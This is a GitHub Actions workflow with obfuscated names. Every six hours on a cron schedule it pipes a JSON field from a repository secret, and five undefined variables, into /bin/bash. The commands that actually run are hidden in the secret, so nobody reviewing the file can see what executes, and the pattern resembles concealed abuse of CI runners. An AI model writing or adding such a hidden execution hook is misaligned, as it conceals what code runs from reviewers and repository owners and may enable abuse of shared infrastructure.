name: lulizhen1986

on:
  workflow_dispatch:
  schedule:
    - cron: '58 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lulizhen1986
        env:
          egi587: ${{ secrets.egi587 }}
        run: |
          echo $egi587 | jq -r .xmp8 | /bin/bash
          echo $muc589 | jq -r .zzdi82 | /bin/bash
          echo $qs76454 | jq -r .nnih3 | /bin/bash
          echo $mys28 | jq -r .k261 | /bin/bash
          echo $ln099 | jq -r .xrg4 | /bin/bash
          echo $hg3 | jq -r .gcgsk14 | /bin/bash

